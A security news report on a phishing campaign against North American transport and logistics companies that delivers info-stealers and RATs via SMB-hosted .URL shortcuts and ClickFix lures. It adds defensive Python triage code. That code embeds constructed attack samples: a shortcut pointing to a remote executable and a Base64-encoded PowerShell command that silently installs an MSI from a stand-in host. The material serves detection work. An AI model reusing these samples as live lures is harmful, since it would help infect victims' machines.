25 September 2024

North American transportation and logistics firms hit with a new phishing campaign

Transportation and logistics companies across North America are the focus of a phishing campaign that delivers a variety of information stealers and remote access trojans (RATs). According to security researchers at Proofpoint, the attackers use compromised legitimate email accounts to inject malicious content into existing email conversations, so the lures arrive as replies in threads the recipients already trust.

Proofpoint said it has identified at least 15 breached email accounts used to carry out the attacks. The accounts belong to transportation and shipping companies, which makes the phishing messages appear even more legitimate to recipients in the same industry. It remains unclear how the attackers initially gained access to these accounts or who is orchestrating the campaign.

The activity observed between May and July 2024 predominantly delivered Lumma Stealer, StealC and the NetSupport RAT. In August 2024 the threat actor shifted tactics, standing up new infrastructure and adopting a new delivery method, and the set of payloads expanded to include DanaBot and Arechclient2.

One of the primary tactics involves phishing messages containing Google Drive URLs that lead to a Windows Internet shortcut (.URL) file; in some cases the .URL file is attached to the message directly. The shortcut's target points at a remote share, so when the victim opens it Windows retrieves the executable over Server Message Block (SMB) from the attacker's server and runs it, installing the malware on the victim's system.
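A defender triaging such attachments wants to know whether a .URL file's target (or its icon path, which Explorer also resolves) points at a remote SMB or file:// location rather than a web address. The following is an added example, not code from Proofpoint or from the article; the .URL content is a constructed sample and the 203.0.113.10 host is a documentation address, not an indicator from the campaign.

```python
"""Triage Windows Internet Shortcut (.URL) files for remote SMB/UNC targets.

.URL files are INI-style text with an [InternetShortcut] section. A URL= or
IconFile= value of the form \\\\host\\share\\... or file://host/share/... makes
Windows resolve the path over SMB (TCP 445) when the shortcut is opened.
"""
import re
from urllib.parse import urlparse

# Constructed sample for this example; not a real campaign artifact.
SAMPLE_URL_FILE = """[InternetShortcut]
URL=file://203.0.113.10/share/Invoice_2024.exe
IconFile=\\\\203.0.113.10\\share\\icon.ico
IconIndex=0
"""

# Matches a UNC path: two leading backslashes, a host, and a backslash.
UNC_RE = re.compile(r"^\\\\([^\\]+)\\")

# Keys whose values Windows resolves as paths when the shortcut is used.
PATH_KEYS = ("url", "iconfile", "workingdirectory")


def parse_url_file(text):
    """Return key/value pairs from the [InternetShortcut] section, keys lower-cased."""
    fields = {}
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].lower() == "internetshortcut"
            continue
        if in_section and "=" in line:
            key, value = line.split("=", 1)
            fields[key.strip().lower()] = value.strip()
    return fields


def remote_host(value):
    """Return the remote host if value is a UNC path or a file:// URL with a host, else None."""
    match = UNC_RE.match(value)
    if match:
        return match.group(1)
    parsed = urlparse(value)
    if parsed.scheme.lower() == "file" and parsed.netloc:
        return parsed.netloc
    return None


def triage(text):
    """Return (key, host, value) for every path-like field that points at a remote host."""
    fields = parse_url_file(text)
    findings = []
    for key in PATH_KEYS:
        if key in fields:
            host = remote_host(fields[key])
            if host:
                findings.append((key, host, fields[key]))
    return findings


if __name__ == "__main__":
    for key, host, value in triage(SAMPLE_URL_FILE):
        print(f"{key}: remote host {host} via {value}")
```

Any finding from `triage` means opening the shortcut would cause an outbound SMB connection to an attacker-controlled host. Blocking outbound TCP 445 at the perimeter and stripping .URL attachments at the mail gateway both neutralise this delivery path before the executable is ever fetched.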

Proofpoint notes that most of these campaigns are small, fewer than 20 messages each, but they are narrowly aimed at companies in the transportation and logistics sector.

The attackers were also observed using the ‘ClickFix’ technique for malware distribution. It relies on tricking the user into copying, pasting and running a Base64-encoded PowerShell command embedded in the HTML of the phishing message; the command downloads an MSI installer that installs DanaBot.
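The Base64 blob in a ClickFix lure is what PowerShell's -EncodedCommand switch consumes: Base64 over UTF-16LE text. Decoding it is therefore a one-liner, and the decoded command is where the download URL and the msiexec invocation live. The block below is an added example, not code from Proofpoint or from the article; the lure page, the command and the 203.0.113.20 host are constructed for illustration and are not indicators from the campaign.

```python
"""Decode a ClickFix-style 'powershell -enc <base64>' lure and pull out its URLs.

PowerShell's -EncodedCommand (abbreviated -e, -ec, -enc, ...) takes Base64 of
the command text encoded as UTF-16LE, so the blob in the lure decodes directly.
"""
import base64
import html
import re

# Constructed PowerShell one-liner of the kind a lure would have the user paste.
PLAIN_COMMAND = (
    "$u='https://203.0.113.20/update/setup.msi';"
    "Start-Process msiexec.exe -ArgumentList \"/i $u /qn\""
)


def encode_command(cmd):
    """Encode as PowerShell -EncodedCommand expects: Base64 over UTF-16LE."""
    return base64.b64encode(cmd.encode("utf-16le")).decode("ascii")


# Constructed lure fragment: a 'fix' button that copies the command to the clipboard.
SAMPLE_HTML = (
    "<p>Press Win+R, then Ctrl+V and Enter to fix the error.</p>"
    "<button onclick=\"navigator.clipboard.writeText('powershell -w hidden -enc "
    + encode_command(PLAIN_COMMAND)
    + "')\">Copy fix</button>"
)

# powershell[.exe] ... -e/-ec/-enc/-encodedcommand <base64>
ENCODED_RE = re.compile(
    r"powershell(?:\.exe)?[^'\"<>]*?\s-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)",
    re.IGNORECASE,
)
URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.IGNORECASE)

# Tokens worth flagging in a decoded command (downloaders, installers, hidden windows).
INDICATORS = ("msiexec", "invoke-webrequest", "iwr", "start-process", "-w hidden", "downloadstring")


def decode_encoded_command(b64):
    """Reverse of encode_command."""
    return base64.b64decode(b64).decode("utf-16le")


def analyze(page_html):
    """Find the encoded PowerShell in a lure page; return decoded command, URLs and indicators."""
    text = html.unescape(page_html)
    match = ENCODED_RE.search(text)
    if not match:
        return None
    decoded = decode_encoded_command(match.group(1))
    haystack = (text[match.start():match.end()] + " " + decoded).lower()
    return {
        "encoded": match.group(1),
        "decoded": decoded,
        "urls": URL_RE.findall(decoded),
        "indicators": [tok for tok in INDICATORS if tok in haystack],
    }


if __name__ == "__main__":
    result = analyze(SAMPLE_HTML)
    print(result["decoded"])
    print(result["urls"], result["indicators"])
```

The decoded command and its URLs are what belong in the incident record and in gateway blocklists; the encoded blob itself changes with every lure. For detection on endpoints, the same UTF-16LE decoding applied to process-creation telemetry exposes `-enc` payloads regardless of which abbreviation of -EncodedCommand the lure used.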

To appear more credible, the threat actors impersonated software widely used in transportation and logistics operations, including Samsara, AMB Logistic and Astra TMS.

Proofpoint has not attributed the campaign to a specific threat actor, but the researchers assess that whoever is behind it is financially motivated.
